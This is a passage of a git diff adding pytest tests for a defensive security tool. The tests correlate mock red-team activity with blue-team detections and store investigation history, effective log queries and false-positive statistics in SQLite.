technique_name="PowerShell", + action="Action 1", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ), + RedTeamActivity( + timestamp=base_time + timedelta(minutes=10), + technique_id="T1059.002", + technique_name="Script", + action="Action 2", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ), + ] + + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(seconds=60), # 60s after + alert_name="Alert 1", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-1", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=10, seconds=120), # 120s after + alert_name="Alert 2", + technique_id="T1059.002", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-2", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + # Mean of 60s and 120s = 90s + assert report.mean_time_to_detect == 90.0 + + def test_generate_report_markdown( + self, + temp_reports_dir: Path, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test markdown report generation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[sample_blue_detection], + operation_id="test-op", + ) + + markdown = correlator.generate_report_markdown(report) + + assert "# Red-Blue Correlation Report" in markdown + assert "Executive Summary" in markdown + assert "test-op" in markdown + assert "Detection Rate" in markdown + + def test_load_red_team_report_basic(self, temp_reports_dir: Path) -> None: + """Test loading a basic red team report.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Create a sample red team report + report_content = """# Red Team Operation Report + +**Operation ID**: op-test-001 +**Target**: 192.168.1.100 +**Started**: 2024-01-15 10:00:00 UTC + +### Hosts (3) +Found 3 hosts during scanning. + +### Credentials (2) +**admin** +Source: password guessing + +**backup** +Source: credential dumping + +### Timeline of Key Events +| Timestamp | Event | Technique | +|-----------|-------|-----------| +| 2024-01-15T10:05:00Z | Initial access | T1078 | +| 2024-01-15T10:10:00Z | Privilege escalation | T1068 | + +**Domain Admin Access**: ✓ +**Golden Ticket**: ✓ +""" + report_path = temp_reports_dir / "redteam-op-test-001.md" + report_path.write_text(report_content) + + operation_id, activities = correlator.load_red_team_report(report_path) + + assert operation_id == "op-test-001" + assert len(activities) > 0 + + # Check for network discovery activity + discovery = next((a for a in activities if a.technique_id == "T1046"), None) + assert discovery is not None + assert "3 host" in discovery.action + + def test_load_investigation_report(self, temp_reports_dir: Path) -> None: + """Test loading an investigation report.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report_content = """# Investigation Report + +**Investigation ID:** `inv-20240115-001` + +| Field | Value | +|-------|-------| +| Alert Name | Suspicious PowerShell Activity | +| Severity | high | +| Status | completed | + +Alert payload contains: +"startsAt": "2024-01-15T10:30:00Z" + +Target IP: 192.168.1.100 + +Technique: T1059.001 + +**Evidence Collected:** 5 +**Highest Pyramid Level:** 3 +""" + report_path = temp_reports_dir / "investigation_20240115_103000.md" + report_path.write_text(report_content) + + detection = correlator.load_investigation_report(report_path) + + assert detection is not None + assert detection.investigation_id == "inv-20240115-001" + assert detection.alert_name == "Suspicious PowerShell Activity" + assert detection.severity == "high" + assert detection.technique_id == "T1059.001" + assert detection.evidence_count == 5 + assert detection.highest_pyramid_level == 3 + + def test_load_investigation_report_skips_no_data(self, temp_reports_dir: Path) -> None: + """Test that DatasourceNoData reports are skipped.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report_path = temp_reports_dir / "investigation_DatasourceNoData_20240115.md" + report_path.write_text("Some content") + + detection = correlator.load_investigation_report(report_path) + + assert detection is None + + def test_load_all_reports(self, temp_reports_dir: Path) -> None: + """Test loading all reports from directory.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Create red team report + red_report = temp_reports_dir / "redteam-op001.md" + red_report.write_text("""# Red Team Report +**Operation ID**: op001 +**Target**: 192.168.1.1 +**Started**: 2024-01-15 10:00:00 UTC +### Hosts (1) +### Credentials (0) +""") + + # Create investigation report + inv_report = temp_reports_dir / "investigation_20240115.md" + inv_report.write_text("""# Investigation +**Investigation ID:** `inv-001` +| Alert Name | Test Alert | +| Severity | high | +| Status | completed | +"startsAt": "2024-01-15T10:30:00Z" +**Evidence Collected:** 1 +**Highest Pyramid Level:** 1 +""") + + # Create non-report file (should be ignored) + other_file = temp_reports_dir / "readme.md" + other_file.write_text("# README") + + red_reports, blue_detections = correlator.load_all_reports() + + assert len(red_reports) == 1 + assert red_reports[0][0] == "op001" + assert len(blue_detections) >= 0 # May or may not parse depending on format + + +class TestDetectionGap: + """Tests for DetectionGap dataclass.""" + + def test_gap_with_recommendation(self, sample_red_activity: RedTeamActivity) -> None: + """Test detection gap with recommendation.""" + gap = DetectionGap( + red_activity=sample_red_activity, + reason="No alert rule configured", + recommended_detection="Add PowerShell monitoring rule", + mitre_data_sources=["Process: Process Creation", "Script: Script Execution"], + ) + + assert gap.reason == "No alert rule configured" + assert gap.recommended_detection == "Add PowerShell monitoring rule" + assert len(gap.mitre_data_sources) == 2 + + def test_gap_without_recommendation(self, sample_red_activity: RedTeamActivity) -> None: + """Test detection gap without recommendation.""" + gap = DetectionGap( + red_activity=sample_red_activity, + reason="Unknown technique", + ) + + assert gap.recommended_detection is None + assert gap.mitre_data_sources == [] diff --git a/tests/test_learning.py b/tests/test_learning.py new file mode 100644 index 00000000..f515ed6a --- /dev/null +++ b/tests/test_learning.py @@ -0,0 +1,529 @@ +"""Tests for the Learning Tools module.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.persistence import InvestigationStore, StoredInvestigation +from ares.tools.blue.learning import LearningTools + + +@pytest.fixture +def temp_db() -> Path: + """Create a temporary database file.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) / "test_learning.db" + + +@pytest.fixture +def store(temp_db: Path) -> InvestigationStore: + """Create a fresh investigation store.""" + return InvestigationStore(temp_db) + + +@pytest.fixture +def learning_tools(store: InvestigationStore) -> LearningTools: + """Create learning tools with test store.""" + return LearningTools(store=store) + + +@pytest.fixture +def populated_store(store: InvestigationStore) -> InvestigationStore: + """Create a store with sample investigation data.""" + now = datetime.now(timezone.utc) + + # Create several investigations + investigations = [ + StoredInvestigation( + investigation_id=f"inv-{i}", + alert_name="HighCPUUsage", + alert_fingerprint="rule-cpu-001", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(hours=i), + completed_at=now - timedelta(hours=i) + timedelta(minutes=10), + duration_seconds=600.0, + status="completed", + evidence_count=i + 1, + highest_pyramid_level=min(i, 4), + techniques_identified=["T1059.001"], + queries_executed=[{"query": "{job='windows'}", "result_count": i}], + query_success_rate=0.7, + effective_queries=["{job='windows'} |= 'powershell'"], + is_true_positive=i % 2 == 0, # Alternating true/false + ) + for i in range(5) + ] + + # Add a different alert type + investigations.append( + StoredInvestigation( + investigation_id="inv-different", + alert_name="SuspiciousLogin", + alert_fingerprint="rule-login-001", + severity="high", + technique_id="T1078", + technique_name="Valid Accounts", + started_at=now - timedelta(hours=1), + completed_at=now - timedelta(minutes=50), + duration_seconds=600.0, + status="completed", + evidence_count=3, + highest_pyramid_level=2, + techniques_identified=["T1078"], + queries_executed=[{"query": "{job='auth'}", "result_count": 5}], + query_success_rate=0.8, + effective_queries=["{job='auth'} |= 'failed'"], + is_true_positive=True, + ) + ) + + for inv in investigations: + store.store_investigation(inv) + + # Add query effectiveness data + for _ in range(5): + store.update_query_effectiveness( + query_pattern="{job='windows'} |= 'powershell'", + successful=True, + produced_evidence=True, + alert_type="HighCPUUsage", + ) + store.update_query_effectiveness( + query_pattern="{job='auth'} |= 'failed'", + successful=True, + produced_evidence=True, + alert_type="SuspiciousLogin", + ) + + return store + + +@pytest.fixture +def populated_learning_tools(populated_store: InvestigationStore) -> LearningTools: + """Create learning tools with populated store.""" + return LearningTools(store=populated_store) + + +class TestLearningToolsInit: + """Tests for LearningTools initialization.""" + + def test_init_with_store(self, store: InvestigationStore) -> None: + """Test initialization with provided store.""" + tools = LearningTools(store=store) + + assert tools._store is store + + def test_init_without_store(self) -> None: + """Test initialization without store uses global.""" + tools = LearningTools() + + assert tools._store is None + # Accessing store property should get/create global store + # (but we won't test that to avoid side effects) + + def test_store_property_returns_provided_store(self, store: InvestigationStore) -> None: + """Test that store property returns provided store.""" + tools = LearningTools(store=store) + + assert tools.store is store + + +class TestFindSimilarInvestigations: + """Tests for find_similar_investigations tool.""" + + @pytest.mark.asyncio + async def test_find_similar_no_results(self, learning_tools: LearningTools) -> None: + """Test finding similar investigations with empty store.""" + result = await learning_tools.find_similar_investigations(alert_name="NonexistentAlert") + + assert result["found"] is False + assert result["investigations"] == [] + assert "No similar investigations" in result["message"] + + @pytest.mark.asyncio + async def test_find_similar_by_alert_name( + self, populated_learning_tools: LearningTools + ) -> None: + """Test finding similar investigations by alert name.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert result["found"] is True + assert result["count"] >= 1 + assert len(result["investigations"]) >= 1 + + # Check investigation structure + inv = result["investigations"][0] + assert "investigation_id" in inv + assert "alert_name" in inv + assert "similarity_score" in inv + assert "matching_factors" in inv + assert "outcome" in inv + + @pytest.mark.asyncio + async def test_find_similar_by_technique(self, populated_learning_tools: LearningTools) -> None: + """Test finding similar investigations by technique.""" + result = await populated_learning_tools.find_similar_investigations( + technique_id="T1059.001" + ) + + assert result["found"] is True + assert result["count"] >= 1 + + # All results should have the matching technique + for inv in result["investigations"]: + assert inv["technique_id"] == "T1059.001" + + @pytest.mark.asyncio + async def test_find_similar_returns_summary( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar returns summary statistics.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert "summary" in result + assert "completion_rate" in result["summary"] + assert "avg_evidence_count" in result["summary"] + assert "true_positives" in result["summary"] + assert "false_positives" in result["summary"] + + @pytest.mark.asyncio + async def test_find_similar_returns_guidance( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar returns investigation guidance.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert "guidance" in result + assert isinstance(result["guidance"], str) + + @pytest.mark.asyncio + async def test_find_similar_respects_limit( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar respects the limit parameter.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage", + limit=2, + ) + + assert len(result["investigations"]) <= 2 + + @pytest.mark.asyncio + async def test_find_similar_includes_effective_queries( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that results include effective queries.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + # At least one investigation should have effective queries + has_queries = any(inv.get("effective_queries") for inv in result["investigations"]) + assert has_queries or result["count"] == 0 + + +class TestGetEffectiveQueries: + """Tests for get_effective_queries tool.""" + + @pytest.mark.asyncio + async def test_get_effective_no_data(self, learning_tools: LearningTools) -> None: + """Test getting effective queries with no data.""" + result = await learning_tools.get_effective_queries() + + assert result["found"] is False + assert result["queries"] == [] + assert "No query effectiveness data" in result["message"] + + @pytest.mark.asyncio + async def test_get_effective_queries_returns_results( + self, populated_learning_tools: LearningTools + ) -> None: + """Test getting effective queries with data.""" + result = await populated_learning_tools.get_effective_queries() + + assert result["found"] is True + assert result["count"] >= 1 + assert len(result["queries"]) >= 1 + + # Check query structure + query = result["queries"][0] + assert "query_pattern" in query + assert "total_uses" in query + assert "success_rate" in query + assert "evidence_rate" in query + + @pytest.mark.asyncio + async def test_get_effective_queries_filtered_by_alert( + self, populated_learning_tools: LearningTools + ) -> None: + """Test getting effective queries filtered by alert type.""" + result = await populated_learning_tools.get_effective_queries(alert_name="HighCPUUsage") + + # Should only return queries used for this alert + for query in result["queries"]: + assert "HighCPUUsage" in query["used_for_alerts"] + + @pytest.mark.asyncio + async def test_get_effective_queries_respects_limit( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that get_effective_queries respects the limit.""" + result = await populated_learning_tools.get_effective_queries(limit=1) + + assert len(result["queries"]) <= 1 + + @pytest.mark.asyncio + async def test_get_effective_queries_includes_recommendation( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that results include a recommendation.""" + result = await populated_learning_tools.get_effective_queries() + + if result["found"]: + assert "recommendation" in result + + +class TestCheckFalsePositivePattern: + """Tests for check_false_positive_pattern tool.""" + + @pytest.mark.asyncio + async def test_check_fp_no_history(self, learning_tools: LearningTools) -> None: + """Test checking FP pattern with no history.""" + result = await learning_tools.check_false_positive_pattern(alert_name="NewAlert") + + assert result["is_known_pattern"] is False + assert result["confidence"] == "low" + assert "No historical data" in result["message"] + + @pytest.mark.asyncio + async def test_check_fp_with_history(self, populated_learning_tools: LearningTools) -> None: + """Test checking FP pattern with history.""" + result = await populated_learning_tools.check_false_positive_pattern( + alert_name="HighCPUUsage" + ) + + assert "false_positive_rate" in result + assert "true_positives" in result or "is_known_pattern" in result + + @pytest.mark.asyncio + async def test_check_fp_high_rate_detection(self, store: InvestigationStore) -> None: + """Test detection of high false positive rate.""" + now = datetime.now(timezone.utc) + + # Create mostly false positive investigations + for i in range(10): + inv = StoredInvestigation( + investigation_id=f"fp-inv-{i}", + alert_name="NoisyAlert", + alert_fingerprint="noisy-rule", + severity="low", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=i), + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + is_true_positive=i < 2, # Only 2/10 true positives + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.check_false_positive_pattern(alert_name="NoisyAlert") + + # Should detect high FP rate (80%) + assert "false_positive_rate" in result + # Either known pattern or has rate info + assert result.get("is_known_pattern") or "80%" in result.get("false_positive_rate", "") + + @pytest.mark.asyncio + async def test_check_fp_with_fingerprint(self, populated_learning_tools: LearningTools) -> None: + """Test checking FP pattern with fingerprint.""" + result = await populated_learning_tools.check_false_positive_pattern( + alert_name="HighCPUUsage", + alert_fingerprint="rule-cpu-001", + ) + + # Should use fingerprint for more accurate matching + assert "confidence" in result + + +class TestGetInvestigationStatistics: + """Tests for get_investigation_statistics tool.""" + + @pytest.mark.asyncio + async def test_get_statistics_empty_store(self, learning_tools: LearningTools) -> None: + """Test getting statistics from empty store.""" + result = await learning_tools.get_investigation_statistics() + + assert result["total_investigations"] == 0 + + @pytest.mark.asyncio + async def test_get_statistics_with_data(self, populated_learning_tools: LearningTools) -> None: + """Test getting statistics with data.""" + result = await populated_learning_tools.get_investigation_statistics() + + assert result["total_investigations"] >= 1 + assert "status_distribution" in result + assert "performance" in result + assert "query_insights" in result + assert "labeling" in result + + @pytest.mark.asyncio + async def test_get_statistics_performance_metrics( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that statistics include performance metrics.""" + result = await populated_learning_tools.get_investigation_statistics() + + perf = result["performance"] + assert "avg_evidence_count" in perf + assert "avg_pyramid_level" in perf + assert "avg_duration_seconds" in perf + + @pytest.mark.asyncio + async def test_get_statistics_labeling_info( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that statistics include labeling information.""" + result = await populated_learning_tools.get_investigation_statistics() + + labeling = result["labeling"] + assert "true_positives" in labeling + assert "false_positives" in labeling + # true_positive_rate may be None or a value + assert "true_positive_rate" in labeling + + +class TestGuidanceGeneration: + """Tests for guidance generation helper.""" + + @pytest.mark.asyncio + async def test_guidance_with_effective_queries( + self, populated_learning_tools: LearningTools + ) -> None: + """Test guidance includes effective query suggestions.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + # Guidance should mention queries if available + if result["found"]: + guidance = result["guidance"] + # Should have some guidance text + assert len(guidance) > 0 + + @pytest.mark.asyncio + async def test_guidance_with_high_tp_rate(self, store: InvestigationStore) -> None: + """Test guidance for high true positive rate alerts.""" + now = datetime.now(timezone.utc) + + # Create mostly true positive investigations + for i in range(5): + inv = StoredInvestigation( + investigation_id=f"tp-inv-{i}", + alert_name="CriticalAlert", + alert_fingerprint="critical-rule", + severity="critical", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=i), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=5, + highest_pyramid_level=3, + techniques_identified=["T1000"], + queries_executed=[], + query_success_rate=0.8, + effective_queries=["{job='test'}"], + is_true_positive=True, # All true positives + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.find_similar_investigations(alert_name="CriticalAlert") + + assert result["found"] is True + # Should mention high TP rate in guidance + guidance = result["guidance"] + assert "true positive" in guidance.lower() or "thorough" in guidance.lower() + + +class TestEdgeCases: + """Tests for edge cases.""" + + @pytest.mark.asyncio + async def test_find_similar_with_all_none_params( + self, populated_learning_tools: LearningTools + ) -> None: + """Test find_similar with all None parameters.""" + result = await populated_learning_tools.find_similar_investigations() + + # Should still return results (recent investigations) + # or indicate no similar found + assert "found" in result + + @pytest.mark.asyncio + async def test_unicode_in_alert_name(self, store: InvestigationStore) -> None: + """Test handling of unicode in alert names.""" + now = datetime.now(timezone.utc) + + inv = StoredInvestigation( + investigation_id="unicode-inv", + alert_name="Alert \u2603 Snowman", # Unicode snowman + alert_fingerprint="unicode-rule", + severity="low", + technique_id=None, + technique_name=None, + started_at=now, + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.find_similar_investigations(alert_name="Alert \u2603 Snowman") + + assert result["found"] is True + + @pytest.mark.asyncio + async def test_very_long_query_pattern(self, store: InvestigationStore) -> None: + """Test handling of very long query patterns.""" + long_query = "{job='test'}" + " |= 'x'" * 100 + + for _ in range(3): + store.update_query_effectiveness( + query_pattern=long_query, + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + tools = LearningTools(store=store) + result = await tools.get_effective_queries() + + # Should handle long queries without error + assert result["found"] is True diff --git a/tests/test_persistence.py b/tests/test_persistence.py new file mode 100644 index 00000000..996240fc --- /dev/null +++ b/tests/test_persistence.py @@ -0,0 +1,537 @@ +"""Tests for the Investigation Persistence and Learning System.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.persistence import ( + InvestigationStore, + QueryEffectiveness, + StoredInvestigation, + get_investigation_store, + reset_investigation_store, +) + + +@pytest.fixture +def temp_db() -> Path: + """Create a temporary database file.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) / "test_investigations.db" + + +@pytest.fixture +def store(temp_db: Path) -> InvestigationStore: + """Create a fresh investigation store.""" + return InvestigationStore(temp_db) + + +@pytest.fixture +def sample_investigation() -> StoredInvestigation: + """Create a sample investigation for testing.""" + now = datetime.now(timezone.utc) + return StoredInvestigation( + investigation_id="inv-001", + alert_name="HighCPUUsage", + alert_fingerprint="rule-123", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=5, + highest_pyramid_level=3, + techniques_identified=["T1059.001", "T1086"], + queries_executed=[ + {"query": "{job='windows'}", "result_count": 10}, + {"query": "{job='linux'}", "result_count": 0}, + ], + query_success_rate=0.5, + effective_queries=["{job='windows'}"], + is_true_positive=True, + analyst_notes="Confirmed malicious activity", + metadata={"host": "server01", "user": "admin"}, + ) + + +class TestStoredInvestigation: + """Tests for StoredInvestigation dataclass.""" + + def test_to_dict(self, sample_investigation: StoredInvestigation) -> None: + """Test conversion to dictionary.""" + data = sample_investigation.to_dict() + + assert data["investigation_id"] == "inv-001" + assert data["alert_name"] == "HighCPUUsage" + assert data["severity"] == "warning" + assert data["technique_id"] == "T1059.001" + assert data["status"] == "completed" + assert data["evidence_count"] == 5 + assert data["is_true_positive"] is True + assert "started_at" in data + assert "completed_at" in data + + def test_from_dict(self, sample_investigation: StoredInvestigation) -> None: + """Test creation from dictionary.""" + data = sample_investigation.to_dict() + restored = StoredInvestigation.from_dict(data) + + assert restored.investigation_id == sample_investigation.investigation_id + assert restored.alert_name == sample_investigation.alert_name + assert restored.severity == sample_investigation.severity + assert restored.technique_id == sample_investigation.technique_id + assert restored.status == sample_investigation.status + assert restored.evidence_count == sample_investigation.evidence_count + assert restored.is_true_positive == sample_investigation.is_true_positive + + def test_from_dict_with_missing_optional_fields(self) -> None: + """Test creation from dict with missing optional fields.""" + minimal_data = { + "investigation_id": "inv-min", + "alert_name": "TestAlert", + "alert_fingerprint": "fp-001", + "severity": "low", + "started_at": datetime.now(timezone.utc).isoformat(), + "completed_at": datetime.now(timezone.utc).isoformat(), + "duration_seconds": 100.0, + "status": "completed", + "evidence_count": 0, + "highest_pyramid_level": 0, + } + + investigation = StoredInvestigation.from_dict(minimal_data) + + assert investigation.investigation_id == "inv-min" + assert investigation.technique_id is None + assert investigation.techniques_identified == [] + assert investigation.queries_executed == [] + assert investigation.is_true_positive is None + + +class TestQueryEffectiveness: + """Tests for QueryEffectiveness dataclass.""" + + def test_success_rate_calculation(self) -> None: + """Test success rate property.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=10, + successful_executions=7, + evidence_producing=3, + alert_types=["AlertA"], + ) + + assert qe.success_rate == 0.7 + + def test_evidence_rate_calculation(self) -> None: + """Test evidence rate property.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=10, + successful_executions=7, + evidence_producing=3, + alert_types=["AlertA"], + ) + + assert qe.evidence_rate == 0.3 + + def test_zero_executions(self) -> None: + """Test rates with zero executions.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=0, + successful_executions=0, + evidence_producing=0, + alert_types=[], + ) + + assert qe.success_rate == 0.0 + assert qe.evidence_rate == 0.0 + + +class TestInvestigationStore: + """Tests for InvestigationStore.""" + + def test_init_creates_schema(self, store: InvestigationStore) -> None: + """Test that schema is created on init.""" + with store._get_connection() as conn: + cursor = conn.cursor() + + # Check investigations table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='investigations'" + ) + assert cursor.fetchone() is not None + + # Check query_effectiveness table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='query_effectiveness'" + ) + assert cursor.fetchone() is not None + + # Check schema_info table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='schema_info'" + ) + assert cursor.fetchone() is not None + + def test_store_and_retrieve_investigation( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test storing and retrieving an investigation.""" + store.store_investigation(sample_investigation) + + retrieved = store.get_investigation(sample_investigation.investigation_id) + + assert retrieved is not None + assert retrieved.investigation_id == sample_investigation.investigation_id + assert retrieved.alert_name == sample_investigation.alert_name + assert retrieved.evidence_count == sample_investigation.evidence_count + assert retrieved.is_true_positive == sample_investigation.is_true_positive + + def test_get_nonexistent_investigation(self, store: InvestigationStore) -> None: + """Test retrieving a non-existent investigation.""" + result = store.get_investigation("nonexistent-id") + assert result is None + + def test_store_investigation_upsert( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test that storing an investigation twice updates it.""" + store.store_investigation(sample_investigation) + + # Modify and store again + sample_investigation.evidence_count = 10 + sample_investigation.status = "escalated" + store.store_investigation(sample_investigation) + + retrieved = store.get_investigation(sample_investigation.investigation_id) + + assert retrieved is not None + assert retrieved.evidence_count == 10 + assert retrieved.status == "escalated" + + def test_find_similar_investigations_by_fingerprint( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations by fingerprint.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_fingerprint=sample_investigation.alert_fingerprint + ) + + assert len(similar) == 1 + assert similar[0].investigation.investigation_id == sample_investigation.investigation_id + assert "same_alert_fingerprint" in similar[0].matching_factors + + def test_find_similar_investigations_by_technique(self, store: InvestigationStore) -> None: + """Test finding similar investigations by technique.""" + now = datetime.now(timezone.utc) + + # Create multiple investigations with same technique + for i in range(3): + inv = StoredInvestigation( + investigation_id=f"inv-{i}", + alert_name=f"Alert{i}", + alert_fingerprint=f"fp-{i}", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=i, + highest_pyramid_level=i, + techniques_identified=["T1059.001"], + queries_executed=[], + query_success_rate=0.5, + effective_queries=[], + ) + store.store_investigation(inv) + + similar = store.find_similar_investigations(technique_id="T1059.001") + + assert len(similar) == 3 + for sim in similar: + assert "same_technique" in sim.matching_factors + + def test_find_similar_investigations_no_criteria( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations with no criteria returns recent.""" + store.store_investigation(sample_investigation) + + # Should return recent investigations + similar = store.find_similar_investigations() + + assert len(similar) >= 0 # May be empty or have results + + def test_find_similar_investigations_multiple_criteria( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations with multiple criteria.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_name=sample_investigation.alert_name, + technique_id=sample_investigation.technique_id, + severity=sample_investigation.severity, + ) + + assert len(similar) == 1 + # alert_name (0.3) + technique (0.15) + severity (0.05) = 0.5 + # Use > 0.49 to account for floating-point precision + assert similar[0].similarity_score > 0.49 # Should have high score with multiple matches + + def test_update_query_effectiveness_new_query(self, store: InvestigationStore) -> None: + """Test updating effectiveness for a new query.""" + store.update_query_effectiveness( + query_pattern="{job='test'}", + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + + # May not appear if total_executions < 3 threshold + # Let's add more executions + for _ in range(2): + store.update_query_effectiveness( + query_pattern="{job='test'}", + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + assert len(effective) == 1 + assert effective[0].query_pattern == "{job='test'}" + assert effective[0].total_executions == 3 + + def test_update_query_effectiveness_existing_query(self, store: InvestigationStore) -> None: + """Test updating effectiveness for an existing query.""" + # Add initial record + for _ in range(3): + store.update_query_effectiveness( + query_pattern="{job='existing'}", + successful=True, + produced_evidence=False, + alert_type="AlertA", + ) + + # Update with evidence + store.update_query_effectiveness( + query_pattern="{job='existing'}", + successful=True, + produced_evidence=True, + alert_type="AlertB", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + matching = [q for q in effective if q.query_pattern == "{job='existing'}"] + + assert len(matching) == 1 + assert matching[0].total_executions == 4 + assert matching[0].evidence_producing == 1 + assert "AlertA" in matching[0].alert_types + assert "AlertB" in matching[0].alert_types + + def test_get_effective_queries_filtered_by_alert_type(self, store: InvestigationStore) -> None: + """Test getting effective queries filtered by alert type.""" + # Add queries for different alert types + for _ in range(3): + store.update_query_effectiveness( + query_pattern="{job='alert_a'}", + successful=True, + produced_evidence=True, + alert_type="AlertA", + ) + store.update_query_effectiveness( + query_pattern="{job='alert_b'}", + successful=True, + produced_evidence=True, + alert_type="AlertB", + ) + + effective_a = store.get_effective_queries(alert_type="AlertA", min_evidence_rate=0.0) + effective_b = store.get_effective_queries(alert_type="AlertB", min_evidence_rate=0.0) + + assert len(effective_a) == 1 + assert effective_a[0].query_pattern == "{job='alert_a'}" + assert len(effective_b) == 1 + assert effective_b[0].query_pattern == "{job='alert_b'}" + + def test_get_statistics( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test getting overall statistics.""" + store.store_investigation(sample_investigation) + + stats = store.get_statistics() + + assert stats["total_investigations"] == 1 + assert "completed" in stats["status_distribution"] + assert stats["avg_evidence_count"] == 5.0 + assert stats["labeling"]["true_positives"] == 1 + assert stats["labeling"]["false_positives"] == 0 + + def test_get_statistics_empty_store(self, store: InvestigationStore) -> None: + """Test getting statistics from empty store.""" + stats = store.get_statistics() + + assert stats["total_investigations"] == 0 + assert stats["avg_evidence_count"] == 0 + assert stats["labeling"]["true_positives"] == 0 + + def test_label_investigation( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test labeling an investigation.""" + sample_investigation.is_true_positive = None + store.store_investigation(sample_investigation) + + # Label as false positive + result = store.label_investigation( + investigation_id=sample_investigation.investigation_id, + is_true_positive=False, + analyst_notes="Benign activity", + ) + + assert result is True + + retrieved = store.get_investigation(sample_investigation.investigation_id) + assert retrieved is not None + assert retrieved.is_true_positive is False + assert retrieved.analyst_notes == "Benign activity" + + def test_label_nonexistent_investigation(self, store: InvestigationStore) -> None: + """Test labeling a non-existent investigation.""" + result = store.label_investigation( + investigation_id="nonexistent", + is_true_positive=True, + ) + + assert result is False + + def test_get_false_positive_patterns(self, store: InvestigationStore) -> None: + """Test getting false positive patterns.""" + now = datetime.now(timezone.utc) + + # Create multiple false positive investigations with same fingerprint + for i in range(5): + inv = StoredInvestigation( + investigation_id=f"fp-inv-{i}", + alert_name="NoisyAlert", + alert_fingerprint="noisy-rule-001", + severity="low", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + is_true_positive=False, + ) + store.store_investigation(inv) + + patterns = store.get_false_positive_patterns(min_occurrences=3) + + assert len(patterns) >= 